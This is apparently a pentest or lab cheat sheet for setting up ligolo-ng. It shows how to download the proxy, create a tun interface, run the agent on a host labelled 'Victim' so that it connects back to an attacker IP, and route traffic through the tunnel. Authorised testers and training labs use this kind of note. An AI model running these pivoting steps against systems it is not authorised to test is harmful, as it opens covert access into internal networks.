Proxy (Goes on the host machine)

Linux

wget -O proxy.tar.gz https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.3/ligolo-ng_proxy_0.8.3_linux_amd64.tar.gz
tar -xvf proxy.tar.gz

Windows

wget -O proxy.zip https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.3/ligolo-ng_proxy_0.8.3_windows_amd64.zip
Expand-Archive -Path .\proxy.zip -DestinationPath .\

Setup

1) Start the Proxy

Attacker:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert

2) Connect the Agent

Victim:

./agent -ignore-cert -connect 10.10.14.78:11601

3) Select the Session

Attacker (Ligolo):

session
1
ifconfig

4) Add Route

Attacker:

sudo ip route add <IP CIDR> dev ligolo

Start the tunnel:

Attacker (Ligolo):

start